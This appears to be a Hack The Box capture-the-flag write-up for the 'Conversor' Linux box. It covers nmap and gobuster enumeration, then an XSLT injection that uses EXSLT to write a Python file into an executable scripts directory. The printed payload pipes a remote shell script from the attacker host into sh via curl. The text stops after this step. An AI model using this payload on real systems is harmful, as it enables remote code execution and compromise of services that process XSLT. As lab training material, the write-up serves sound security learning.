HTB Conversor - Linux Easy Box Writeup

Summary

Conversor is an easy Linux box that involves exploiting an XSLT injection vulnerability to achieve code execution, followed by database enumeration for privilege escalation to user, and finally abusing sudo permissions for root access.

Skills Required:

  • Basic web application testing
  • XSLT injection knowledge
  • Database enumeration
  • Hash cracking
  • Sudo privilege escalation

Enumeration

Nmap Scan

nmap -sC -sV -oA conversor 10.10.x.x

Results:

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.9p1 Ubuntu 3ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   256 01:74:26:39:47:bc:6a:e2:cb:12:8b:71:84:9c:f8:5a (ECDSA)
|_  256 3a:16:90:dc:74:d8:e3:c4:51:36:e2:08:06:26:17:ee (ED25519)
80/tcp open  http    Apache httpd 2.4.52
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://conversor.htb/
|_http-server-header: Apache/2.4.52 (Ubuntu)

Domain Setup

Add the domain to /etc/hosts:

echo "10.10.x.x conversor.htb" >> /etc/hosts

Web Application Analysis

Navigating to http://conversor.htb reveals a web application called "Conversor" with user registration functionality.

An image to describe post

After registering and logging in, we discover the main functionality - an XML and XSLT file converter:

An image to describe post

Directory Discovery

Using gobuster to enumerate directories:

gobuster dir -u http://conversor.htb -w /usr/share/wordlists/dirb/common.txt

Key findings:

  • /static/ - Static files directory
  • /scripts/ - Scripts directory (executable)

Exploitation

XSLT Injection Analysis

The application accepts XML and XSLT file uploads for transformation. This presents an opportunity for XSLT injection using EXSLT extensions.

Initial Payload Testing

First attempt was to write a Python script to /static/ directory, but files in this location are served as static content rather than executed.

Successful Code Execution

Moving the payload to /scripts/ directory allows for code execution.

Malicious XSLT payload:

<?xml version="1.0" encoding="UTF-8"?>
<xsl:stylesheet
    xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
    xmlns:exploit="http://exslt.org/common"
    extension-element-prefixes="exploit"
    version="1.0">
<xsl:template match="/">
<exploit:document href="/var/www/conversor.htb/scripts/shell.py" method="text">
import os
os.system("curl 10.10.x.x:8000/shell.sh|sh")
</exploit:document>
</xsl:template>
</xsl:stylesheet>
#web #exploit #xml trick